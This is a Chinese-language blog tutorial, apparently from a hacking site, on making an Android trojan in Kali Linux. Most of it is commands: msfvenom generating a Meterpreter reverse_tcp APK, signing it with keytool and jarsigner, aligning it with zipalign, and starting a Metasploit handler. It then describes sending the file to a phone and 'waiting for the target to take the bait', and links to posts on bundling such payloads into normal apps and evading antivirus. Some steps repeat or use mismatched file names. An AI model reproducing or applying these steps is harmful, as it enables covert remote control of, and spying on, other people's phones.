|
kali linux生成安卓木马一、前期准备工作
- 安装好kali linux链接我已经准备好了(忍一下,我没有找到别的网盘,蓝奏云盘上传不了),上网搜一下“ventoy”下载下来,然后把镜像拖进去就可以了
进入引导界面时选择“graphbalabala”(图形安装)要不然可能不会
新手的话所有选项切记一定都要选则默认的!!!
新手的话所有选项切记一定都要选则默认的!!!
新手的话所有选项切记一定都要选则默认的!!!
二、命令
2.1进入kalilinux
鼠标右键打开终端
2.1.1获取当前系统所在局域网的ip地址
输入
上图中 inet后面的就是本机目前linux系统的ip地址
我目前的ip地址是192.168.131.129
2.2创建木马2.2.1输入下列命令:msfvenom -p android/meterpreter/reverse_tcp LHOST=你kali的ip LPORT=5555 R > /root/apk.apk
该命令会创建一个在根目录下的一个名为apk的apk文件。
其中的lhost是你的系统ip,lport是接口,在这里设置为5555。
keytool -genkey -V -keystore apk-trojan-key.keystore -alias apk -keyalg RSA -keysize 1024 -validity 999
输入上述命令之后
按照我的填写方式把每一步填好。
里面的密钥库口令自行设置!!!
2.3.2接下来
jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore apk-trojan-key.keystore apk.apk apk
2.3.3验证证书
输入
jarsigner -verify -verbose apk.apk
2.3.3验证证书
输入
jarsigner -verify -verbose apk.apk
到这步就成功一大半了
zipalign -v 4 520.apk aaaa.apk
2.3.4apt update——更新安装指令
等待更新结束。
2.3.5优化apk
先输入:apt install zipalign
再使用:zipalign -v 4 apk.apk aaaa.apk
结束后如图,优化成功。
2.4启动模块2.4.1输入msfconsole
效果如图:
2.4.2加载模块
use exploit/multi/handler
2.4.3简略步骤了
set payload android/meterpreter/reverse_tcp //选择Payload
show options //查看参数设置
这个payload里边有两个参数要设置 LHOST和LPORT 表示地址和端口 默认的端口是4444
现在我们来更改设置:
1.set LHOST 192.168.131.129 //这里的地址设置成我们刚才生成木马的IP地址
2.set LPORT 5555 //这里的端口设置成刚才我们生成木马所监听的端口
3.exploit //开始执行漏洞 开始监听,等待手机上线
2.5使用xshell7将木马传递给Windows再传给安卓。
利用xshell传文件
三、等待目标上钩
在这里我手机版本不对,但是电脑模拟器可以。
这表示目标上钩。
输入help可以查看你可以控制的操作。
到这步,试验成功。
Ok啦,自己试一试吧
|
![[实测]MSF捆绑正常APP-X黑手网](https://cdn.x10001.com/2023/12/20231204051003796.jpg)
![[实操教学]木马免杀技术揭秘:如何巧妙绕过火绒杀毒?-X黑手网](https://cdn.x10001.com/2024/11/20241106183642725.png)
没有回复内容